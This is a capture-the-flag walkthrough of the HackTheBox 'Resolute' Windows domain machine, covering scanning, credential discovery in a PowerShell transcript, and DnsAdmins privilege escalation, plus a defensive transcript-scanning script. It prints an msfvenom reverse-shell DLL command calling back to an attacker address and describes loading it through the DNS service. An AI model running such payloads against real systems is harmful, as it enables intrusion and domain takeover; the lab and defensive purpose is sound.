
Hackthebox Resolute


This post is a walkthrough of the Resolute machine on HackTheBox. The user part is basic enumeration. The root part is so much fun, and I learned new things about privilege escalation.

nmap

kali@0xOE:~/Desktop|⇒  nmap  -T4 -A  -v 10.10.10.169  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-27 07:00 EDT                            
NSE: Loaded 151 scripts for scanning.                                      
NSE: Script Pre-scanning.                                                  
Initiating NSE at 07:00                                                    
Completed NSE at 07:00, 0.00s elapsed                               
Initiating NSE at 07:00                                                    
Completed NSE at 07:00, 0.00s elapsed                                      
Initiating NSE at 07:00                                                    
Completed NSE at 07:00, 0.00s elapsed       
Initiating Ping Scan at 07:00                                              
Scanning 10.10.10.169 [2 ports]                                            
Completed Ping Scan at 07:00, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:00           
Completed Parallel DNS resolution of 1 host. at 07:00, 0.01s elapsed             
Initiating Connect Scan at 07:00                                                 
Scanning 10.10.10.169 [1000 ports]                                         
Discovered open port 445/tcp on 10.10.10.169                                     
Discovered open port 139/tcp on 10.10.10.169                                     
Discovered open port 53/tcp on 10.10.10.169                      
Discovered open port 135/tcp on 10.10.10.169                                               
Discovered open port 636/tcp on 10.10.10.169                               
Discovered open port 593/tcp on 10.10.10.169                           
Discovered open port 3268/tcp on 10.10.10.169                              
Discovered open port 389/tcp on 10.10.10.169                               
Discovered open port 3269/tcp on 10.10.10.169                                    
Discovered open port 88/tcp on 10.10.10.169                                                
Discovered open port 464/tcp on 10.10.10.169                                     
Completed Connect Scan at 07:00, 4.87s elapsed (1000 total ports)                
Initiating Service scan at 07:00                                                 
Scanning 11 services on 10.10.10.169                                             
Completed Service scan at 07:02, 87.04s elapsed (11 services on 1 host)                    
NSE: Script scanning 10.10.10.169.           
Initiating NSE at 07:02                      
Completed NSE at 07:02, 14.83s elapsed                                                     
Initiating NSE at 07:02                      
Stats: 0:02:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                 
NSE: Active NSE Script Threads: 3 (3 waiting)                                              
NSE Timing: About 96.59% done; ETC: 07:03 (0:00:03 remaining)                              
Completed NSE at 07:04, 120.46s elapsed                                                    
Initiating NSE at 07:04                        
Completed NSE at 07:04, 0.00s elapsed                                                          
Nmap scan report for 10.10.10.169              
Host is up (0.082s latency).                   
Not shown: 989 closed ports                    
PORT     STATE SERVICE      VERSION            
53/tcp   open  domain?                         
| fingerprint-strings:                         
|   DNSVersionBindReqTCP:                      
|     version                                  
|_    bind                                     
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-27 11:10:40Z) 
135/tcp  open  msrpc        Microsoft Windows RPC                                              
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn                                      
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)                                                                   
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)                                                                                             
464/tcp  open  kpasswd5?                       
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0                                
636/tcp  open  tcpwrapped                      
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)                                                                   
3269/tcp open  tcpwrapped                      
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                  
SF-Port53-TCP:V=7.80%I=7%D=3/27%Time=5E7DDCF6%P=x86_64-pc-linux-gnu%r(DNSV                     
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\                     
SF:x04bind\0\0\x10\0\x03");                    
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows                       

Host script results:                           
|_clock-skew: mean: 2h29m34s, deviation: 4h02m30s, median: 9m34s                               
| smb-os-discovery:                            
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)                                                                                                         
|   Computer name: Resolute                    
|   NetBIOS computer name: RESOLUTE\x00                                                        
|   Domain name: megabank.local                
|   Forest name: megabank.local                
|   FQDN: Resolute.megabank.local              
|_  System time: 2020-03-27T04:12:02-07:00                                                     
| smb-security-mode:                           
|   account_used: <blank>                      
|   authentication_level: user                 
|   challenge_response: supported              
|_  message_signing: required                  
| smb2-security-mode:                          
|   2.02:                                      
|_    Message signing enabled and required                                                     
| smb2-time:                                   
|   date: 2020-03-27T11:12:03                  
|_  start_date: 2020-03-27T05:42:21            

NSE: Script Post-scanning.                     
Initiating NSE at 07:04                        
Completed NSE at 07:04, 0.00s elapsed                                                          
Initiating NSE at 07:04                        
Completed NSE at 07:04, 0.00s elapsed                                                          
Initiating NSE at 07:04                        
Completed NSE at 07:04, 0.00s elapsed                                                          
Read data files from: /usr/bin/../share/nmap                                                   
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                
Nmap done: 1 IP address (1 host up) scanned in 227.93 seconds  

Enum4linux

Then I used enum4linux. I got the password and the domain users.

password: Welcome123!


I used Evil-WinRM to establish a shell with the domain users. I tried all usernames one by one, and I got the user flag with melanie:Welcome123!


Privilege Escalation

When I checked the users on the system, I saw ryan, and I didn't have permission to access that user's directory. I searched the system for ryan's credentials. For this I used the dir -force command; -force shows hidden files.

I found PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt in the directory C:\PSTranscripts\20191203:

**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; 
value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; 
value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

We can see the user's creds ryan:Serv3r4Admin4cc123!. We can use Evil-WinRM to establish a shell as ryan.
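PowerShell transcription is a useful audit trail, but as the transcript above shows it also records any secret typed on a command line, so the PSTranscripts directory needs tight ACLs and the files are worth scanning for exactly this kind of leak. The following Python script is an added example, not code from the post: it parses the transcript format shown above (the `Command start time` records and the `ParameterBinding(Invoke-Expression): name="Command"` values that Evil-WinRM-style sessions produce) and flags commands that carry an inline credential, reporting them with the secret redacted. The sample transcript, its account names, host names and passwords are constructed for this example; the rule names and helper functions are my own.

```python
"""Scan PowerShell transcripts for commands that embed credentials (added example, not from the post)."""
import re
from datetime import datetime
from typing import Dict, List

# Constructed transcript modelled on the format in the post; the account, host and
# passwords below are made up for this example.
SAMPLE_TRANSCRIPT = r'''**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: EXAMPLE\alice
RunAs User: EXAMPLE\alice
Machine: DC01 (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS example\alice@DC01 Documents> "
PS example\alice@DC01 Documents>
**********************
Command start time: 20191203063500
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; 
value="Get-ChildItem -Force C:\Users
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; 
value="cmd /c net use X: \\fs01\backups alice Example-P4ss-123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
**********************
Command start time: 20191203063530
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; 
value="$s = ConvertTo-SecureString 'Example-P4ss-456!' -AsPlainText -Force
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
'''

# PowerShell writes one of these headers per command.
HEADER_RE = re.compile(r"^Command start time: (\d{14})[ \t]*$", re.M)
# The typed command is logged as Invoke-Expression's "Command" parameter; the value
# can span several lines and ends at a double quote followed by a newline.
CMD_RE = re.compile(r'name="Command";[ \t]*\nvalue="(.*?)"(?:\n|$)', re.S)

# Each rule captures the secret in group 1 so the report can redact it.
LEAK_RULES = [
    # "net use X: \\host\share <password> /user:..." and the malformed form seen in
    # the post ("... <user> <password>"): any bare token after the UNC path that is
    # neither a /switch nor "*" (which makes net prompt for the password).
    ("net use with inline password",
     re.compile(r"net\s+use\s+\S+\s+\\\\\S+(?:\s+\S+)*\s+([^/\s*]\S*)", re.I)),
    ("ConvertTo-SecureString from a plaintext literal",
     re.compile(r"ConvertTo-SecureString\b(?=.*-AsPlainText)[^'\"]*['\"]([^'\"]+)['\"]", re.I)),
    ("-Password given as a literal",
     re.compile(r"-Password\s+['\"]?([^\s'\"$(][^\s'\"]*)", re.I)),
]


def parse_transcript(text: str) -> List[Dict[str, str]]:
    """Return the commands a transcript recorded, oldest first."""
    entries = []
    parts = HEADER_RE.split(text)  # [preamble, time1, chunk1, time2, chunk2, ...]
    for i in range(1, len(parts) - 1, 2):
        start, chunk = parts[i], parts[i + 1]
        m = CMD_RE.search(chunk)
        if not m:  # prompt / Out-String records carry no command
            continue
        # The first line is what was typed; the rest is the session wrapper's exit check.
        command = m.group(1).splitlines()[0]
        entries.append({
            "start": start,
            "when": datetime.strptime(start, "%Y%m%d%H%M%S").isoformat(),
            "command": command,
        })
    return entries


def find_credential_leaks(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the leak rules to each command and return redacted findings."""
    findings = []
    for e in entries:
        for rule, rx in LEAK_RULES:
            m = rx.search(e["command"])
            if m:
                findings.append({
                    "start": e["start"],
                    "rule": rule,
                    "redacted": e["command"].replace(m.group(1), "<REDACTED>"),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_credential_leaks(parse_transcript(SAMPLE_TRANSCRIPT)):
        print(f"{f['start']}  {f['rule']}: {f['redacted']}")
```

Pointed at a real transcript directory, the same `parse_transcript` call runs over each `PowerShell_transcript.*.txt` file. The `net use` rule deliberately matches the malformed form seen in the post, with user and password as bare positional arguments: the command failed with a syntax error, but its secret still landed in the log.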


As we can see, ryan is a member of the DnsAdmins group. I searched for DnsAdmins-to-Domain-Admins methods. There are many blogs on this topic, for example From DnsAdmins to SYSTEM to Domain Compromise.

Create Payload

kali@0xOE:~|⇒ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LPORT=7878 LHOST=10.10.14.187  -f dll > /home/kali/onur.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes

When I uploaded the DLL to the machine with Evil-WinRM's upload method, the DLL was deleted. Probably Windows Defender is active. I used another method, SMB sharing. For this I used impacket.

Smb Sharing

I reconfigured the DNS service to use my onur.dll as the serverlevelplugin.dll and then restarted the DNS service.

Getting Root Flag


This post is licensed under CC BY 4.0
